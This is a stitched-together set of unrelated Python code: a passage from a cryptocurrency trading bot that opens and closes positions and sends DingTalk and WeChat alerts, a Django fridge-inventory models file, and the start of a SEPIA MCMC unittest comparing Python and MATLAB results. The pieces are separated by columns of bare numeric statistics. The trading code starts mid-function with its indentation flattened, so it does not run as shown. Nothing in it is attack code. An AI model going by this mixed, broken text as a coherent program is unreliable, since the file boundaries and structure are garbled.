self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.bid
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.pos = -self.pos
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 + self.short_stoploss)
self.takeprofit_price = enter_price * (1 - self.short_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开空"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开空交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == 2:  # Trend reversed: open long after the short was closed
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.ask
res_buy = self.buy(enter_price, abs(self.pos), mark=True)
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 - self.long_stoploss)
self.takeprofit_price = enter_price * (1 + self.long_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开多3"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开多交易所返回:{res_buy}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == -2:  # Trend reversed: open short after the long was closed
self.HYJ_jd_ss = 0
self.pos = self.round_to(self.trading_size, self.min_volume)
enter_price = self.bid
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.pos = -self.pos
self.enter_price = enter_price
self.stoploss_price = enter_price * (1 + self.short_stoploss)
self.takeprofit_price = enter_price * (1 - self.short_takeprofit)
self.high_price = enter_price
self.low_price = enter_price
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.pos_update_time = datetime.now()
self.sync_data()
HYJ_jd_first = f"交易对:{self.symbol},仓位:{self.pos}"
HYJ_jd_tradeType = "开空3"
HYJ_jd_curAmount = f"{enter_price}"
HYJ_jd_remark = f"最新价:{self.last_price}"
dingding(f"开空交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.pos > 0:  # Holding a long position; the stop currently keys off HYJ_jd_ss = 11. Add your own stop logic below if needed.
enter_price = self.bid2 # +1
Profit = self.round_to((enter_price - self.enter_price) * abs(self.pos), self.min_price)
if self.HYJ_jd_ss == 11:  # HYJ_jd_ss = 11 means the trend has reversed
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
self.stop_price = 0
HYJ_jd_first = "趋势反转平多:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "平多"
HYJ_jd_curAmount = "%s" % enter_price
HYJ_jd_remark = "趋势反转平多:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势反转平多,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == 22:  # HYJ_jd_ss = 22 means the trend has contracted
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
self.stop_price = 0
HYJ_jd_first = "趋势收缩平多:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "平多"
HYJ_jd_curAmount = "%s" % enter_price
HYJ_jd_remark = "趋势收缩平多:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势收缩平多,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.last_price < self.stoploss_price:
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
self.times += 1  # Consecutive-loss counter
self.stop_price = 0
HYJ_jd_first = "止损平多:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "止损平多"
HYJ_jd_curAmount = "%s" % enter_price
HYJ_jd_remark = "止损平多:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"止损平多,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.takeprofit_price != 0 and self.last_price > self.takeprofit_price:
self.HYJ_jd_ss_old = 1
res_sell = self.sell(enter_price, abs(self.pos), mark=True)
self.HYJ_jd_ss = 0
HYJ_jd_first = "止盈A:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.times = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.stop_price = 0
HYJ_jd_tradeType = "平多"
HYJ_jd_curAmount = "%s" % enter_price
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"多单,止盈A,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
# elif self.unRealizedProfit > 0.1 and self.high_price - self.last_price > 1:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈B:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈B,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.unRealizedProfit > 0.05 and self.high_price - self.last_price > 1:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈C:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈C,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.1 and self.high_price - self.last_price > 2:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈D:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈D,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.05 and self.high_price - self.last_price > 2:
#
# self.HYJ_jd_ss_old = 1
# res_sell = self.sell(enter_price, abs(self.pos))
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈E:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# HYJ_jd_tradeType = "平多"
# HYJ_jd_curAmount = "%s" % enter_price
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"多单,止盈E,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.pos < 0:  # Holding a short position
enter_price = self.ask2
Profit = self.round_to((self.enter_price - enter_price) * abs(self.pos), self.min_price)
if self.HYJ_jd_ss == -11:
self.HYJ_jd_ss_old = -1
self.stop_price = 0
res_sell = self.buy(enter_price, abs(self.pos), mark=True)  # Close the short
self.HYJ_jd_ss = 0
HYJ_jd_first = "趋势反转平空:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "趋势反转平空:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势反转平空,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.HYJ_jd_ss == -22:
self.HYJ_jd_ss_old = -1
self.stop_price = 0
res_sell = self.buy(enter_price, abs(self.pos), mark=True)  # Close the short
self.HYJ_jd_ss = 0
HYJ_jd_first = "趋势收缩平空:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "趋势收缩平空:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"趋势收缩平空,交易所返回:{res_sell}", symbols=self.symbol)
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.stoploss_price != 0 and self.last_price > self.stoploss_price:
self.HYJ_jd_ss_old = -1
self.stop_price = 0
res_sell = self.buy(enter_price, abs(self.pos), mark=True)  # Close the short
self.HYJ_jd_ss = 0
self.times += 1  # Consecutive-loss counter
HYJ_jd_first = "止损平空:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_remark = "止损:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
self.stoploss_price = 0
self.takeprofit_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"止损平空,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
elif self.takeprofit_price > self.last_price:
self.HYJ_jd_ss_old = -1
res_sell = self.buy(enter_price, abs(self.pos), mark=True)  # Close the short
self.HYJ_jd_ss = 0
HYJ_jd_first = "止盈A:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
self.pos = 0
HYJ_jd_tradeType = "平空"
HYJ_jd_curAmount = "%s" % self.enter_price
HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
Profit, self.last_price, self.high_price, self.low_price)
self.times = 0
self.stoploss_price = 0
self.takeprofit_price = 0
self.stop_price = 0
self.enter_price = 0
self.high_price = 0
self.low_price = 0
self.maxunRealizedProfit = 0
self.unRealizedProfit = 0
self.lowProfit = 0
self.sync_data()
dingding(f"空单,止盈A,交易所返回:{res_sell}")
wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
# elif self.unRealizedProfit > 0.1 and self.last_price - self.low_price > 1:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # Close the short
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈B:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈B,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.unRealizedProfit > 0.05 and self.last_price - self.low_price > 1:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # Close the short
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈C:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈C,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.1 and self.last_price - self.low_price > 2:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # Close the short
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈D:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈D,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
#
# elif self.maxunRealizedProfit > 0.05 and self.last_price - self.low_price > 2:
#
# self.HYJ_jd_ss_old = -1
# res_sell = self.buy(enter_price, abs(self.pos)) # Close the short
# self.HYJ_jd_ss = 0
# HYJ_jd_first = "止盈E:交易对:%s,最大亏损:%s,最大利润:%s,当前利润:%s,仓位:%s" % (
# self.symbol, self.lowProfit, self.maxunRealizedProfit, self.unRealizedProfit, self.pos)
# self.pos = 0
# HYJ_jd_tradeType = "平空"
# HYJ_jd_curAmount = "%s" % self.enter_price
# HYJ_jd_remark = "净利:%s,最新价:%s,最高价:%s,最低价:%s" % (
# Profit, self.last_price, self.high_price, self.low_price)
# self.times = 0
# self.stoploss_price = 0
# self.takeprofit_price = 0
# self.stop_price = 0
# self.enter_price = 0
# self.high_price = 0
# self.low_price = 0
# self.maxunRealizedProfit = 0
# self.unRealizedProfit = 0
# self.lowProfit = 0
# self.sync_data()
# dingding(f"空单,止盈E,交易所返回:{res_sell}")
# wx_send_msg(HYJ_jd_first, HYJ_jd_tradeType, HYJ_jd_curAmount, HYJ_jd_remark)
| 53.059774
| 130
| 0.493119
| 3,681
| 32,844
| 4.131758
| 0.044281
| 0.073969
| 0.057203
| 0.034716
| 0.908015
| 0.893944
| 0.883096
| 0.870143
| 0.870143
| 0.859886
| 0
| 0.017214
| 0.407472
| 32,844
| 618
| 131
| 53.145631
| 0.764298
| 0.243119
| 0
| 0.753968
| 0
| 0.02381
| 0.060326
| 0.048473
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007937
| false
| 0
| 0.007937
| 0
| 0.02381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bad3eb696ee5cd5240656eb13ce329d03ddd15b
| 1,306
|
py
|
Python
|
fridge_web/my_fridge/models.py
|
logiflo/snowplow-embeded-fridge
|
8d356f8c5f225de7a50c04ac9a88c4b3ae89d7cd
|
[
"BSD-2-Clause"
] | 1
|
2020-08-28T08:32:35.000Z
|
2020-08-28T08:32:35.000Z
|
my_fridge/models.py
|
logiflo/fridge-django
|
07fe585d65698ac78a2499ec1674738859324d05
|
[
"BSD-2-Clause"
] | null | null | null |
my_fridge/models.py
|
logiflo/fridge-django
|
07fe585d65698ac78a2499ec1674738859324d05
|
[
"BSD-2-Clause"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
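# Essencial and Food share the same text/owner/unit/quantity fields; Food only
# adds a Meta class to override the plural name shown in the admin.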
class Essencial(models.Model):
"""Essencials in your fridge.
"""
text = models.CharField(max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
UNIT_CHOICES = [
('Kg', 'Kilogram'),
('g', 'Gram'),
('L', 'Litre'),
('unit', 'Unit'),
]
units = models.CharField(max_length=15, choices=UNIT_CHOICES)
quantity = models.FloatField(default=0.0)
def __str__(self):
"""Return a string representation of the model
"""
return self.text
class Food(models.Model):
"""Food in the fridge.
"""
text = models.CharField(max_length=200)
date_added = models.DateTimeField(auto_now_add=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
UNIT_CHOICES = [
('Kg', 'Kilogram'),
('g', 'Gram'),
('L', 'Litre'),
('unit', 'Unit'),
]
units = models.CharField(max_length=15, choices=UNIT_CHOICES)
quantity = models.FloatField(default=0.0)
class Meta:
verbose_name_plural = 'Food'
def __str__(self):
"""Return a string representation of the model
"""
return self.text
| 24.641509
| 65
| 0.614855
| 154
| 1,306
| 5.045455
| 0.38961
| 0.07722
| 0.092664
| 0.123552
| 0.792793
| 0.792793
| 0.792793
| 0.792793
| 0.792793
| 0.792793
| 0
| 0.014242
| 0.24732
| 1,306
| 52
| 66
| 25.115385
| 0.776195
| 0.117152
| 0
| 0.75
| 0
| 0
| 0.055258
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.65625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e7ffe12f3f73e69c4371e3fe8b1948d9b38b6ed7
| 10,625
|
py
|
Python
|
dev/dev_test/SepiaMCMCTestCase.py
|
lanl/SEPIA
|
0a1e606e1d1072f49e4f3f358962bd8918a5d3a3
|
[
"BSD-3-Clause"
] | 19
|
2020-06-22T16:37:07.000Z
|
2022-02-18T22:50:59.000Z
|
dev/dev_test/SepiaMCMCTestCase.py
|
lanl/SEPIA
|
0a1e606e1d1072f49e4f3f358962bd8918a5d3a3
|
[
"BSD-3-Clause"
] | 41
|
2020-07-07T22:52:33.000Z
|
2021-11-04T14:05:03.000Z
|
dev/dev_test/SepiaMCMCTestCase.py
|
lanl/SEPIA
|
0a1e606e1d1072f49e4f3f358962bd8918a5d3a3
|
[
"BSD-3-Clause"
] | 6
|
2020-08-14T18:58:45.000Z
|
2022-03-01T21:00:14.000Z
|
import unittest
import numpy as np
from time import time
from setup_test_cases import *
"""
NOTE: requires matlab.engine.
To install at command line:
> source activate <sepia conda env name>
> cd <matlabroot>/extern/engines/python
> python setup.py install
"""
class SepiaMCMCTestCase(unittest.TestCase):
"""
Checks MCMC results between matlab and python.
Run files in matlab/ dir to generate data prior to running these tests.
"""
def test_mcmc_univ_sim_only(self):
print('starting test_mcmc_univ_sim_only', flush=True)
show_figs = True
seed = 42.
n_mcmc = 100
m = 300
# call function to do matlab setup/sampling
model, matlab_output = setup_univ_sim_only(m=m, seed=seed, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
plt.figure(i)
for j in range(param_shape):
plt.subplot(1, param_shape, j+1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_univ_sim_and_obs(self):
print('starting test_mcmc_univ_sim_and_obs', flush=True)
show_figs = True
seed = 42.
n_mcmc = 100
m = 100
n = 10
model, matlab_output = setup_univ_sim_and_obs(m=m, n=n, seed=seed, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
plt.figure(i)
for j in range(param_shape):
plt.subplot(1, param_shape, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_multi_sim_only(self):
print('starting test_mcmc_multi_sim_only', flush=True)
show_figs = True
seed = 42.
n_mcmc = 30
m = 20
nt = 10
n_pc = 4
nx = 5
model, matlab_output = setup_multi_sim_only(m=m, nt=nt, nx=nx, n_pc=n_pc, seed=seed, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
if param_shape >= 5:
ncol = 5
nrow = int(np.ceil(param_shape / ncol))
else:
ncol = param_shape
nrow = 1
plt.figure(i)
for j in range(param_shape):
plt.subplot(nrow, ncol, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_multi_sim_and_obs(self):
print('starting test_mcmc_multi_sim_and_obs', flush=True)
show_figs = True
seed = 42.
n_mcmc = 20
m = 200
n = 20
nt_sim = 75
nt_obs = 50
n_pc = 5 # must be smaller than nt
nx = 3
noise_sd = 0.1
model, matlab_output = setup_multi_sim_and_obs(m=m, n=n, nt_sim=nt_sim, nt_obs=nt_obs, noise_sd=noise_sd,
nx=nx, n_pc=n_pc, seed=seed, n_lik=0, n_mcmc=n_mcmc)
